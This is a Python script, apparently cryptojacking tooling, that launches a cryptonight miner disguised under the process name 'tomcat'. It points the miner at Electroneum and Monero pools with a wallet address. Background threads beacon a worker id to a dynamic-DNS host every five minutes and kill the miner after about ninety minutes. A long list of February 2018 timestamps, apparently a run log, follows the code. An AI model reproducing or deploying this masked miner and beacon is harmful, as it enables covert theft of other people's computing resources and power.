import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:22:05.224135
#2018-02-17 17:10:01.577950
#2018-02-17 18:58:01.470079
#2018-02-17 20:46:06.343229
#2018-02-17 22:33:05.128652
#2018-02-18 00:16:05.805137
#2018-02-18 02:07:03.949412
#2018-02-18 03:53:05.730821
#2018-02-18 05:39:01.290015
#2018-02-18 07:32:04.306402
#2018-02-18 09:20:06.160660
#2018-02-18 11:06:06.541247
#2018-02-18 12:53:03.921598
#2018-02-18 14:41:07.183675
#2018-02-18 16:31:01.395970
#2018-02-18 18:20:09.265221
#2018-02-18 20:07:01.805672
#2018-02-18 21:53:06.748188
#2018-02-18 23:43:07.003039
#2018-02-19 01:29:03.517169
#2018-02-19 03:17:03.916561
#2018-02-19 05:02:07.191823
#2018-02-19 06:48:05.695352
#2018-02-19 08:37:06.728548
#2018-02-19 10:26:04.945225
#2018-02-19 12:14:07.124240
#2018-02-19 14:01:05.999640
#2018-02-19 15:50:06.114860
#2018-02-19 17:38:09.363749
#2018-02-19 19:26:01.724237
#2018-02-19 21:14:01.810731
#2018-02-19 23:00:09.386574
#2018-02-20 00:43:04.007787
#2018-02-20 02:33:06.455669
#2018-02-20 04:22:03.672240
#2018-02-20 06:05:05.866158
#2018-02-20 07:50:01.741908
#2018-02-20 09:36:05.018502
#2018-02-20 11:21:01.347263
#2018-02-20 13:07:06.992433
#2018-02-20 14:52:04.400164
#2018-02-20 16:39:01.370657
#2018-02-20 18:25:04.708723
#2018-02-20 20:17:05.961083
#2018-02-20 22:03:06.447692
#2018-02-20 23:45:03.738918
#2018-02-21 01:31:07.420139
#2018-02-21 03:18:05.636530
#2018-02-21 05:07:06.198256
#2018-02-21 06:55:05.020411
#2018-02-21 08:41:04.325079
#2018-02-21 10:27:06.417664
#2018-02-21 12:14:08.700664
#2018-02-21 14:03:04.694375
#2018-02-21 15:47:08.383485
#2018-02-21 17:40:04.142062
#2018-02-21 19:26:05.359149
#2018-02-21 21:13:07.751480
#2018-02-21 23:01:01.998237
#2018-02-22 00:50:04.103526
#2018-02-22 02:37:05.427189
#2018-02-22 04:22:03.900275
#2018-02-22 06:07:08.269924
#2018-02-22 07:52:07.687881
#2018-02-22 09:41:01.974723
#2018-02-22 11:26:08.688071
#2018-02-22 13:13:08.203605
#2018-02-22 15:03:09.595811
#2018-02-22 16:46:01.755866
#2018-02-22 18:32:06.737406
#2018-02-22 20:25:02.951058
#2018-02-22 22:11:08.173017
#2018-02-22 23:58:02.006950
#2018-02-23 01:46:06.750872
#2018-02-23 03:34:04.377625
#2018-02-23 05:18:04.571450
#2018-02-23 07:04:08.319466
#2018-02-23 08:54:05.639691
#2018-02-23 11:13:02.076079
#2018-02-23 13:10:04.028032
#2018-02-23 14:54:06.995750
#2018-02-23 16:42:07.634071
#2018-02-23 18:28:08.227837
#2018-02-23 20:12:01.619393
#2018-02-23 22:01:04.133115
#2018-02-23 23:49:04.400284
#2018-02-24 01:40:07.530762
#2018-02-24 03:29:04.924449
#2018-02-24 05:15:01.559030
#2018-02-24 07:03:05.684039
#2018-02-24 08:37:07.238351
#2018-02-24 10:07:04.809241
#2018-02-24 11:52:01.510606
#2018-02-24 13:20:06.692527
#2018-02-24 14:51:01.749415
#2018-02-24 16:23:04.180786
#2018-02-24 18:02:07.086987
#2018-02-24 19:32:01.452279
#2018-02-24 21:08:03.571269
#2018-02-24 23:11:07.501145
#2018-02-25 01:33:05.003530
#2018-02-25 05:04:07.091610
#2018-02-25 10:06:01.779255